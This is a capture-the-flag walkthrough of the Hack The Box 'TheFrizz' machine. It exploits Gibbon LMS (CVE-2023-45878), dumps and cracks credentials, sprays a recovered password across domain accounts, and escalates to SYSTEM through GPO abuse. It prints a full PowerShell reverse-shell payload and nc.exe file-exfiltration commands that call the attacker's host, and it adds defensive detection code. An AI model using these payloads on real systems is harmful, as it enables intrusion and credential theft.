Reconnaissance
Run a scan with nmap.
PORT      STATE SERVICE       REASON          VERSION
22/tcp    open  ssh           syn-ack ttl 127 OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-03-10 19:34:56Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53587/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53591/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53601/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Investigating TCP/80
Open the site in a browser.

The link in the top right of the page leads to the login page.

In the bottom left of the page, "Powered by Gibbon v25.0.00" is shown.
A Google search turns up an unauthenticated RCE for this version (CVE-2023-45878).
Clone the exploit and run it.
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ git clone https://github.com/dgoorden/CVE-2023-45878.git
Cloning into 'CVE-2023-45878'...
remote: Enumerating objects: 30, done.
remote: Counting objects: 100% (30/30), done.
remote: Compressing objects: 100% (28/28), done.
remote: Total 30 (delta 7), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (30/30), 12.45 KiB | 3.11 MiB/s, done.
Resolving deltas: 100% (7/7), done.

┌──(kali㉿kali)-[~/htb/thefrizz/CVE-2023-45878]
└─$ python3 CVE-2023-45878.py -l 10.10.14.179 -p 4444 -u http://frizzdc.frizz.htb/Gibbon-LMS/
[!] Exploit written for CVE-2023-45878, Gibbon LMS 25.0.1
[+] Exploit Sent to: http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php
[+] Reverse Shell Target: 10.10.14.179:4444
[!] Make sure you have a listener running: nc -lvnp 4444
[+] HTTP Response Code: 200
[+] PHP Web Shell Uploaded Successfully!
[+] Attempting to trigger reverse shell...
[+] Payload delivered. Check your listener.
[!] If no connection, verify manually: http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=whoami

┌──(kali㉿kali)-[~/htb/thefrizz/CVE-2023-45878]
└─$
After running the above, a shell comes back on the waiting nc listener.
The current directory contains config.php, which holds the database credentials.
SHELL> dir
Directory: C:\xampp\htdocs\Gibbon-LMS
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/20/2023 6:04 AM i18n
d----- 1/20/2023 6:04 AM installer
d----- 1/20/2023 6:04 AM lib
d----- 1/20/2023 6:04 AM modules
d----- 1/20/2023 6:04 AM resources
d----- 1/20/2023 6:04 AM src
d----- 1/20/2023 6:04 AM themes
d----- 10/29/2024 7:28 AM uploads
d----- 1/20/2023 6:04 AM vendor
-a---- 1/20/2023 6:04 AM 634 .htaccess
-a---- 1/20/2023 6:04 AM 197078 CHANGEDB.php
-a---- 1/20/2023 6:04 AM 103023 CHANGELOG.txt
-a---- 1/20/2023 6:04 AM 2972 composer.json
-a---- 1/20/2023 6:04 AM 294353 composer.lock
-a---- 10/11/2024 8:15 PM 1307 config.php
SHELL> type config.php
.
*/
/**
* Sets the database connection information.
* You can supply an optional $databasePort if your server requires one.
*/
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
/**
* Sets a globally unique id, to allow multiple installs on a single server.
*/
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';
/**
* Sets system-wide caching factor, used to balance performance and freshness.
* Value represents number of page loads between cache refresh.
* Must be positive integer. 1 means no caching.
*/
$caching = 10;
SHELL>
Change directory to C:\xampp\mysql\bin and try to access the DB.
Running mysql.exe interactively gives no response in this shell, so use the -e option to query for information instead.
SHELL> ./mysql.exe -u MrGibbonsDB -p'MisterGibbs!Parrot!?1'
SHELL> show databases;
Invoke-Expression : The term 'show' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:482
+ ... r,0,$BytesRead-1);$Output=try{Invoke-Expression $Command 2>&1|Out-Str ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (show:String) [Invoke-Expression], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.InvokeExpressionCommand
SHELL> ./mysql.exe -u MrGibbonsDB -p'MisterGibbs!Parrot!?1' -Bse 'show databases;'
gibbon
information_schema
test
SHELL>
The gibbonperson table contains the password hash for f.frizzle.
./mysql.exe -u MrGibbonsDB -p'MisterGibbs!Parrot!?1' -E -e 'use gibbon; select * from gibbonperson'
SHELL>
*************************** 1. row ***************************
gibbonPersonID: 0000000001
title: Ms.
surname: Frizzle
firstName: Fiona
preferredName: Fiona
officialName: Fiona Frizzle
nameInCharacters:
gender: Unspecified
username: f.frizzle
passwordStrong: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03
passwordStrongSalt: /aACFhikmNopqrRTVz2489
passwordForceReset: N
status: Full
canLogin: Y
gibbonRoleIDPrimary: 001
gibbonRoleIDAll: 001
dob: NULL
email: f.frizzle@frizz.htb
Joining the obtained hash and salt with ":" and running hashcat recovers the password.
$ cat fizzle.hash
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489

$ hashcat -m 1420 -a 0 fizzle.hash ./rockyou.txt
hashcat (v6.2.5) starting

OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-AMD Ryzen 3 3100 4-Core Processor, 2898/5860 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: ./rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1420 (sha256($salt.$pass))
Hash.Target......: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff...Vz2489
Time.Started.....: Sun Mar 15 23:21:05 2026 (5 secs)
Time.Estimated...: Sun Mar 15 23:21:10 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2498.8 kH/s (0.32ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 11022336/14344385 (76.84%)
Rejected.........: 0/11022336 (0.00%)
Restore.Point....: 11018240/14344385 (76.81%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: JessdoG1 -> JazIris@@
The f.frizzle account authenticates successfully over Kerberos (the error shown below is KRB_AP_ERR_SKEW, a clock-skew error, not a credential failure).
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\f.frizzle:Jenni_Luvs_Magic23 KRB_AP_ERR_SKEW
Since Kerberos authentication succeeds, request a TGT for this account.
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ impacket-getTGT frizz.htb/f.frizzle:Jenni_Luvs_Magic23
Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache
Generate a krb5.conf.
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ netexec smb frizzdc.frizz.htb -u f.frizzle -p Jenni_Luvs_Magic23 -k --generate-krb5-file krb5.conf
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
Obtaining user.txt
Authenticate with Kerberos using the generated krb5.conf and f.frizzle.ccache.
Logging in over SSH gives access to user.txt.
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ export KRB5_CONFIG=krb5.conf
export KRB5CCNAME=f.frizzle.ccache
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ ssh f.frizzle@frizz.htb
The authenticity of host 'frizz.htb (10.129.7.89)' can't be established.
ED25519 key fingerprint is: SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'frizz.htb' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
PowerShell 7.4.5
PS C:\Users\f.frizzle>
Privilege Escalation
Run BloodHound to collect domain information.
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ bloodhound-python -u f.frizzle -p 'Jenni_Luvs_Magic23' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.129.232.168 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: frizz.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Testing resolved hostname connectivity dead:beef::cbac:db18:1aa1:7e6e
INFO: Trying LDAP connection to dead:beef::cbac:db18:1aa1:7e6e
INFO: Testing resolved hostname connectivity dead:beef::194
INFO: Trying LDAP connection to dead:beef::194
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Testing resolved hostname connectivity dead:beef::cbac:db18:1aa1:7e6e
INFO: Trying LDAP connection to dead:beef::cbac:db18:1aa1:7e6e
INFO: Testing resolved hostname connectivity dead:beef::194
INFO: Trying LDAP connection to dead:beef::194
INFO: Found 22 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frizzdc.frizz.htb
INFO: Done in 00M 36S
INFO: Compressing output into 20260322225046_bloodhound.zip
Also log in over SSH and list the domain users.
Save the users found as a list (users.txt).
PS C:\Users\f.frizzle> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
a.perlstein              Administrator            c.ramon
c.sandiego               d.hudson                 f.frizzle
g.frizzle                Guest                    h.arm
J.perlstein              k.franklin               krbtgt
l.awesome                m.ramon                  M.SchoolBus
p.terese                 r.tennelli               t.wright
v.frizzle                w.li                     w.Webservice
The command completed with one or more errors.

PS C:\Users\f.frizzle>
Users' Recycle Bins are stored under C:\$RECYCLE.BIN.
The Recycle Bin contains .7z files.
PS C:\> cd '$RECYCLE.BIN'
PS C:\$RECYCLE.BIN> ls -force
Directory: C:\$RECYCLE.BIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-2932701813-1103
PS C:\$RECYCLE.BIN> cd S-1-5-21-2386970044-1145388522-2932701813-1103
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> ls
Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103>
Move the .7z files that were found to the Desktop.
PS C:\$RECYCLE.BIN> Get-ChildItem -Force -File -Recurse 'C:\$RECYCLE.BIN' -Filter '*.7z' | ForEach-Object { Move-Item $_.FullName "$env:USERPROFILE\Desktop" }
PS C:\$RECYCLE.BIN> cd
PS C:\Users\f.frizzle> cd Desktop
PS C:\Users\f.frizzle\Desktop> ls
Directory: C:\Users\f.frizzle\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
-ar-- 3/18/2026 1:19 PM 34 user.txt
The official walkthrough transfers the 7z file to Kali with scp, but in my environment the transfer did not work.
I also tried uploading meterpreter and transferring the file from there, but that did not work either.
In my environment I ended up transferring the file with nc.exe.
Transferring nc (run with a web server started on Kali):
Invoke-WebRequest -Uri "http://10.10.14.179/nc.exe" -OutFile "nc.exe"

Transferring the file through the uploaded nc:
cmd /c ".\nc.exe 10.10.14.179 4444 < c:\Users\`$RE2XMEG.7z"
Listener side (Kali):
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ sudo nc -lnvp 4444 > R.7z
listening on [any] 4444 ...
connect to [10.10.14.179] from (UNKNOWN) [10.129.232.168] 51766
I could not confirm that the transfer had completed, but the file size had stopped growing at 30416987 bytes, so I ended it with Ctrl+C and extracted the file.
Extracting the archive produces a directory named wapt.
┌──(kali㉿kali)-[~/htb/thefrizz/wapt]
└─$ ls
COPYING.txt common.py languages setupdevhelpers.py ssl wapt-get.exe wapt-signpackages.py waptlicences.pyd waptserver.exe waptwua DLLs conf lib setuphelpers.py templates wapt-get.exe.manifest wapt.psproj waptmessage.exe waptservice.exe wgetwads32.exe Scripts conf.d licencing.py setuphelpers_linux.py trusted_external_certs wapt-get.ini waptbinaries.sha256 waptpackage.py wapttftpserver wgetwads64.exe __pycache__ db log setuphelpers_macos.py unins000.msg wapt-get.ini.tmpl waptconsole.exe.manifest waptpython.exe wapttftpserver.exe auth_module_ad.py keyfinder.py private setuphelpers_unix.py version-full wapt-get.py waptcrypto.py waptpythonw.exe wapttray.exe cache keys revision.txt setuphelpers_windows.py wapt-enterprise.ico wapt-scanpackages.py waptguihelper.pyd waptself.exe waptutils.py
A password is found in conf/waptserver.ini.
┌──(kali㉿kali)-[~/htb/thefrizz/wapt]
└─$ grep -r 'password =' .
./waptutils.py:            self._password = password
./waptutils.py:            self._password = self._password_callback(self._keyfile)
./conf/waptserver.ini:wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
Base64-decoding the value reveals the password.
┌──(kali㉿kali)-[~/htb/thefrizz/wapt]
└─$ echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d
!suBcig@MehTed!R
Checking the recovered password against the user list shows that it belongs to M.SchoolBus.
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ netexec smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' -k --continue-on-success
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\a.perlstein:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Administrator:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\c.ramon:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\c.sandiego:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\d.hudson:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\f.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\g.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Guest:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\h.arm:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\J.perlstein:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\k.franklin:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\krbtgt:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\l.awesome:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\m.ramon:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\p.terese:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\r.tennelli:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\t.wright:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\v.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\w.li:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\w.Webservice:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
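From the defender's side, the run above leaves a distinctive trace on the domain controller: one source failing Kerberos pre-authentication for many accounts in a few seconds, then obtaining a TGT for one of them. The following is an added example, not part of the original writeup, that detects that pattern over constructed records modelled on Windows security events 4771 (pre-authentication failed) and 4768 (TGT issued); the field names, thresholds and sample values are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records modelled on DC security events: 4771 = Kerberos
# pre-authentication failed (status 0x18 = KDC_ERR_PREAUTH_FAILED, 0x12 =
# KDC_ERR_CLIENT_REVOKED for disabled accounts), 4768 = TGT issued. Not real log data.
EVENTS = [
    {"time": "2026-03-22T22:40:01", "id": 4771, "user": "a.perlstein", "ip": "10.10.14.179", "status": "0x18"},
    {"time": "2026-03-22T22:40:01", "id": 4771, "user": "Administrator", "ip": "10.10.14.179", "status": "0x18"},
    {"time": "2026-03-22T22:40:02", "id": 4771, "user": "c.ramon", "ip": "10.10.14.179", "status": "0x18"},
    {"time": "2026-03-22T22:40:02", "id": 4771, "user": "Guest", "ip": "10.10.14.179", "status": "0x12"},
    {"time": "2026-03-22T22:40:03", "id": 4771, "user": "f.frizzle", "ip": "10.10.14.179", "status": "0x18"},
    {"time": "2026-03-22T22:40:03", "id": 4771, "user": "krbtgt", "ip": "10.10.14.179", "status": "0x12"},
    {"time": "2026-03-22T22:40:04", "id": 4768, "user": "M.SchoolBus", "ip": "10.10.14.179", "status": "0x0"},
    {"time": "2026-03-22T22:40:04", "id": 4771, "user": "p.terese", "ip": "10.10.14.179", "status": "0x18"},
    # One mistyped password from a workstation: normal noise, not a spray.
    {"time": "2026-03-22T22:41:10", "id": 4771, "user": "w.li", "ip": "10.129.7.50", "status": "0x18"},
]

SPRAY_MIN_ACCOUNTS = 5          # distinct accounts failing from one source (assumed threshold)
WINDOW = timedelta(minutes=5)   # within this time span (assumed)


def _ts(ev):
    return datetime.fromisoformat(ev["time"])


def detect_spray(events, min_accounts=SPRAY_MIN_ACCOUNTS, window=WINDOW):
    """Map source IP -> sorted accounts for sources that fail pre-auth on at
    least min_accounts distinct accounts inside one sliding window."""
    fails = defaultdict(list)
    for ev in sorted(events, key=_ts):
        if ev["id"] == 4771 and ev["status"] in ("0x18", "0x12"):
            fails[ev["ip"]].append((_ts(ev), ev["user"]))
    hits = {}
    for ip, items in fails.items():
        for i, (t0, _) in enumerate(items):          # slide the window start
            users = {u for t, u in items[i:] if t - t0 <= window}
            if len(users) >= min_accounts:
                hits[ip] = sorted(users)
                break
    return hits


def sprayed_then_succeeded(events, sprays, window=WINDOW):
    """Accounts issued a TGT (4768) from a spraying source within the window of
    that source's failures: the credential that finally matched."""
    fail_times = defaultdict(list)
    for ev in events:
        if ev["id"] == 4771 and ev["ip"] in sprays:
            fail_times[ev["ip"]].append(_ts(ev))
    hit = set()
    for ev in events:
        if ev["id"] == 4768 and ev["ip"] in sprays:
            if any(abs(_ts(ev) - t) <= window for t in fail_times[ev["ip"]]):
                hit.add(ev["user"])
    return hit
```

Running detect_spray on the sample flags 10.10.14.179 with seven accounts, and sprayed_then_succeeded names M.SchoolBus as the account to reset first.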
Connect over SSH as M.SchoolBus.
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@MehTed!R'
Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in M.SchoolBus.ccache
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ netexec smb frizzdc.frizz.htb -u M.SchoolBus -p '!suBcig@MehTed!R' -k --generate-krb5-file krb5.conf
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ export KRB5CCNAME=M.SchoolBus.ccache

┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ export KRB5_CONFIG=krb5.conf
Also, looking at M.SchoolBus's permissions in BloodHound, the account has WriteGPLink (the right to link a GPO to an OU or to the domain) over an OU.

Based on the above, create a new GPO and use it to run a reverse shell.
First, build the reverse-shell payload on Kali.
kali@kali:~$ pwsh
PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.179",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
PS> $EncodedText =[Convert]::ToBase64String($Bytes)
PS> $EncodedText
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
PS> exit
Next, create a new GPO. Here it is named "RevGPO".
PS C:\Users\M.SchoolBus> New-GPO -Name RevGPO | New-GPLink -Target "DC=FRIZZ,DC=HTB" -LinkEnabled Yes

GpoId       : 8a4ad255-87a1-49a4-9e6d-b2e7db0af4ac
DisplayName : RevGPO
Enabled     : True
Enforced    : False
Target      : DC=frizz,DC=htb
Order       : 3
Next, start an nc listener on Kali.
Then use SharpGPOAbuse to set the reverse-shell command as an immediate task in the GPO.
PS C:\Users\M.SchoolBus> .\SharpGPOAbuse.exe --addcomputertask --GPOName "RevGPO" --Author "test" --TaskName "RevShell" --Command "powershell.exe" --Arguments "powershell -e ..."
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] GUID of "RevGPO" is: {8A4AD255-87A1-49A4-9E6D-B2E7DB0AF4AC}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{8A4AD255-87A1-49A4-9E6D-B2E7DB0AF4AC}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus>
PS C:\Users\M.SchoolBus>
PS C:\Users\M.SchoolBus> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
PS C:\Users\M.SchoolBus>
Once the above command completes, a SYSTEM shell comes back on the waiting nc listener.
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ sudo nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.179] from (UNKNOWN) [10.129.232.168] 62937
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>
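What SharpGPOAbuse leaves behind is a ScheduledTasks.xml under the GPO's Machine\Preferences\ScheduledTasks folder in SYSVOL, which is where a defender can find it. The following added example (not code from the writeup or from SharpGPOAbuse) parses a constructed file with an ImmediateTaskV2 entry and decodes its -e argument by reversing the Unicode+base64 steps used above; the element names follow the Group Policy Preferences schema, while the clsid/uid values, attributes and the payload are constructed stand-ins.

```python
import base64
import re
import xml.etree.ElementTree as ET


def encode_command(text):
    """UTF-16LE then base64: the transform applied in the pwsh steps above, which is what powershell -e expects."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_command(b64):
    return base64.b64decode(b64).decode("utf-16-le")


# Constructed stand-in for the encoded one-liner and for the XML SharpGPOAbuse writes;
# element names follow the GPP ScheduledTasks schema, clsid/uid/attributes are assumed.
CONSTRUCTED_CMD = '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.179",4444)'
SAMPLE_XML = r"""<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="RevShell" uid="{CONSTRUCTED-UID}">
    <Properties action="C" name="RevShell" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>powershell.exe</Command>
            <Arguments>powershell -e __B64__</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
""".replace("__B64__", encode_command(CONSTRUCTED_CMD))

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_ARG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def audit_scheduled_tasks(xml_text):
    """Return one finding per ImmediateTaskV2: task name, the account it runs as,
    the command, and the decoded payload when an encoded-command argument is present."""
    findings = []
    for task in ET.fromstring(xml_text).iter("ImmediateTaskV2"):
        props = task.find("Properties")
        exe = props.find(".//Exec") if props is not None else None
        cmd = exe.findtext("Command", "") if exe is not None else ""
        args = exe.findtext("Arguments", "") if exe is not None else ""
        m = ENCODED_ARG.search(args)
        findings.append({
            "name": task.get("name"),
            "run_as": props.get("runAs") if props is not None else None,
            "command": cmd,
            "decoded": decode_command(m.group(1)) if m else None,
            # an immediate task running encoded PowerShell is the pattern the tool leaves
            "suspicious": m is not None and "powershell" in (cmd + args).lower(),
        })
    return findings
```

Pointing this at every Policies\{GUID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml in SYSVOL, together with the GPT.ini version bump the tool output mentions, gives a quick audit of freshly added immediate tasks.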